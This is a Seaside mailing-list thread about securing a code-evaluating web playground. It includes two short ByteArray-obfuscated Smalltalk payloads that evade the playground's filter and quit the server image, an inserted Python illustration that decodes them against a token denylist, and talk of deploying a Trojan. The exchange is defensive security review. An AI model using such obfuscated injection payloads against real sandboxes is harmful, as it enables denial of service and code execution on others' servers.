I have made a seaside playground application for Seaside 3.0x.
To check it out, just load the package

Seaside-Tests-Playground-obi.4.mcz

MCHttpRepository

Gerhard

_______________________________________________
seaside mailing list
[hidden email]
http://lists.squeakfoundation.org/cgi-bin/mailman/listinfo/seaside

Cool, thanks.
Cheers
Philippe

2010/1/9 Gerhard Obermann <[hidden email]>:
> I have made a seaside playground application for Seaside 3.0x.
>
> To check it out, just load the package
>
> Seaside-Tests-Playground-obi.4.mcz
>
> MCHttpRepository
> location: 'http://www.squeaksource.com/Seaside30Addons'
> user: 'obi'
> password: ''
>
> Gerhard

Hi,
I have tried on Squeak Trunk, and got an error. Log is attached.
regards,
Vaidotas

SqueakDebug.log (5K)

It's only tested with Pharo!
Gerhard

2010/1/9 Vaidotas Didžbalis <[hidden email]>
> Hi,

It should work with Squeak too.
But you didn't load JQuery (It's a prerequisite)!

Gerhard

2010/1/9 Vaidotas Didžbalis <[hidden email]>
> Hi,

What is this exactly? Some demos?
Lukas

--
Lukas Renggli
http://www.lukas-renggli.ch

It's a playground for seaside 3.0x.
Just load the package for a demo!

It automatically creates the render code if you use the predefined tags or you can write the render code by yourself and you can check the results immediately.
Also the callbacks can be used and the results can be checked.

Maybe it would be nice if we could put it on the demo seaside page.

Gerhard

On Sat, Jan 9, 2010 at 8:05 PM, Lukas Renggli <[hidden email]> wrote:
> What is this exactly? Some demos?

Screenshots please :)

Screenshot is attached!

Gerhard

Screen.png (48K)

Mhh, that looks extremely cool. However you can basically kill the
image, take over the server, format the harddisk?

Lukas

This is cool indeed!

2010/1/10 Lukas Renggli <[hidden email]>
> Mhh, that looks extremely cool. However you can basically kill the
> image, take over the server, format the harddisk?

Yes, I think this is the problem.
For example, I tried an anchor, then put Object explore or self halt.
Then, I save and both actions are executed opening either the explorer or the debugger which is problematic.

Cheers,

--
Cédrick

The latest version doesn't allow simple hacks anymore.
Unfortunately it's still possible to open a window in the image.
It should not be possible to kill the server or even execute shell commands.

If anyone can still do some dangerous hacks, please let me know.

Gerhard

> The latest version doesn't allow simple hacks anymore.
It took me about 3 minutes to take over your computer and do whatever I want with it ;-)

    self class compile: #[115 117 114 112 114 105 115 101 32 34 73 110 32 101 118 101 114 121 98 111 100 121 32 104 97 110 100 115 33 34 32 83 109 97 108 108 116 97 108 107 73 109 97 103 101 32 99 117 114 114 101 110 116 32 115 110 97 112 115 104 111 116 58 32 102 97 108 115 101 32 97 110 100 81 117 105 116 58 32 116 114 117 101] asString.
    self surprise

Lukas

fun :o)
2010/1/10 Lukas Renggli <[hidden email]>
It took me 1 minute to understand what you did :))
--
Cédrick

That's not a simple hack.
And it doesn't really take over the computer.

Anyway, such hacks are not possible anymore.

Gerhard

> That's not a simple hack.
> And it doesn't really take over the computer.

Sure. As soon as I can execute arbitrary Smalltalk code on your machine, I can deploy a Trojan for your platform.

> Anyway, such hacks are not possible anymore.

There is an infinite number of other hacks. It gets harder over time, but the one below is particularly simple:

    html evaluateUnloggedForSelf: #[34 73 110 115 116 97 108 108 32 116 104 101 32 102 97 118 111 114 105 116 101 32 116 114 111 121 97 110 34 32 83 109 97 108 108 116 97 108 107 73 109 97 103 101 32 99 117 114 114 101 110 116 32 115 110 97 112 115 104 111 116 58 32 102 97 108 115 101 32 97 110 100 81 117 105 116 58 32 116 114 117 101] asString

My point is that no matter how much time you spend on making it secure by checking for particular patterns or strings, there will always be ways to fool it. In the Smalltalk world security is inherently weak, mostly because of the strong reflective capabilities.

I would really love to see your application on the web, but in its current form we won't be able to run it on seaside.st.

Lukas

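An added illustration, not part of the thread and not code from the playground package: a small Python check showing why a string denylist passes the snippet shape used in the message above, and what a reviewer sees once the ByteArray literal is decoded. The denylist entries and the sample submission are constructed assumptions; the sample reuses the `evaluateUnloggedForSelf:` form quoted in the message.

```python
import re

# Constructed denylist of the pattern-matching kind discussed in the thread.
DENYLIST = ("snapshot:", "andQuit:", "compile:", "halt", "explore")

# Smalltalk ByteArray literal: #[65 66 67]
BYTE_ARRAY = re.compile(r"#\[([\d\s]*)\]")

# Constructed sample submission (same shape as the snippet in the message).
SAMPLE = (
    "html evaluateUnloggedForSelf: #[83 109 97 108 108 116 97 108 107 73 "
    "109 97 103 101 32 99 117 114 114 101 110 116 32 115 110 97 112 115 "
    "104 111 116 58 32 102 97 108 115 101 32 97 110 100 81 117 105 116 "
    "58 32 116 114 117 101] asString"
)


def denylist_hits(text, denylist=DENYLIST):
    """Return the denylisted tokens that occur literally in text."""
    return sorted(tok for tok in denylist if tok in text)


def decode_byte_arrays(source):
    """Decode every ByteArray literal in source to the text it spells."""
    decoded = []
    for match in BYTE_ARRAY.finditer(source):
        values = [int(v) for v in match.group(1).split()]
        if all(0 <= v <= 255 for v in values):
            decoded.append(bytes(values).decode("latin-1"))
    return decoded


def review(source):
    """Compare what the text filter sees with what the literal contains."""
    hidden = decode_byte_arrays(source)
    hidden_hits = {hit for text in hidden for hit in denylist_hits(text)}
    return {
        "raw_hits": denylist_hits(source),
        "decoded": hidden,
        "decoded_hits": sorted(hidden_hits),
    }


if __name__ == "__main__":
    report = review(SAMPLE)
    print("filter sees  :", report["raw_hits"])
    print("literal says :", report["decoded"])
    print("hidden hits  :", report["decoded_hits"])
```

Decoding literals only covers this one encoding; it does not turn the pattern check into a sound filter, which is the objection raised in the message above.
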
Are there any options to make it really secure?
Gerhard

2010/1/11 Gerhard Obermann <[hidden email]>
> Are there any options to make it really secure?

The best option is probably to serve it independently of seaside.st and include it in seaside.st.

Also, you should catch undeclared variables: I just tried the following expression that opens a debugger as the variable is not declared

    html anchor callback: [anAction]; with: 'Click me'.

Cheers Gerhard

--
Cédrick

2010/1/11 Gerhard Obermann <[hidden email]>
> Are there any options to make it really secure?

Maybe not allowing strings of more than, say, 20 characters is a first step. Of course, string concatenation must be controlled too... Forbidding ByteArray use is also a good point I guess ...

hth
Cédrick

Very interesting!
Thanks!